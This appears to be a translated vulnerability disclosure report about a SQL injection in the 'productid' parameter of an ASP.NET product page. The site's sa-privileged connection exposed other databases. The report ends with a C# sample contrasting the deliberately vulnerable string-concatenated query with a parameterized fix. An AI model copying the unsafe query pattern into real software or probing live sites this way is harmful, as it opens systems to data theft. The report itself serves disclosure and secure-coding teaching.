2015-12-03: Details reported to the vendor; awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and experts in the relevant field
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-22: Details disclosed to the public
As in the title.
Main site address:
http://**.**.**.**/pc/index.aspx
Injection address:
http://**.**.**.**/pc/productlist.aspx?productid=2 (the productid parameter is injectable)
Proof of the amount of data in the Back_Database database
60 tables:
The connection runs with sa privileges, so other databases are reachable; table information for DB_ComunityBack_online (129 tables):
Proven; not explored further.
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-12-08 11:10
CNVD confirmed the reported situation and has notified the website's administering organization through the public contact information on the site.
None yet
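The report gives no code, so the following is an added C# illustration (not code from the affected site or from the report) of the bug class behind it: an ASP.NET page that splices the productid query parameter into T-SQL, beside the parameterized form that closes the hole. The table, column and connection-string names are assumed.

```csharp
// Added example; not the affected site's code. Table/column names are hypothetical.
using System;
using System.Data;
using System.Data.SqlClient;

public static class ProductListData
{
    // VULNERABLE pattern (the bug class reported): the raw request value becomes part
    // of the SQL text, so productid=2 can carry arbitrary T-SQL. Because the site's
    // connection logged in as sa, an injected statement could read every other
    // database on the server, which is exactly what the cross-database dump showed.
    public static DataTable LoadProductsUnsafe(string productId, string connStr)
    {
        string sql = "SELECT ProductName, Price FROM Products WHERE ProductId = " + productId;
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    // HARDENED: reject anything that is not a positive integer, then bind the value as
    // a typed parameter so it can never alter the statement's structure. Pair this
    // with a connection string that uses a low-privilege login scoped to one database
    // (e.g. "User ID=web_reader" instead of sa), so even a future bug cannot cross
    // into other databases.
    public static DataTable LoadProductsSafe(string productId, string connStr)
    {
        if (!int.TryParse(productId, out int id) || id <= 0)
            throw new ArgumentException("productid must be a positive integer");

        const string sql = "SELECT ProductName, Price FROM Products WHERE ProductId = @id";
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }
}
```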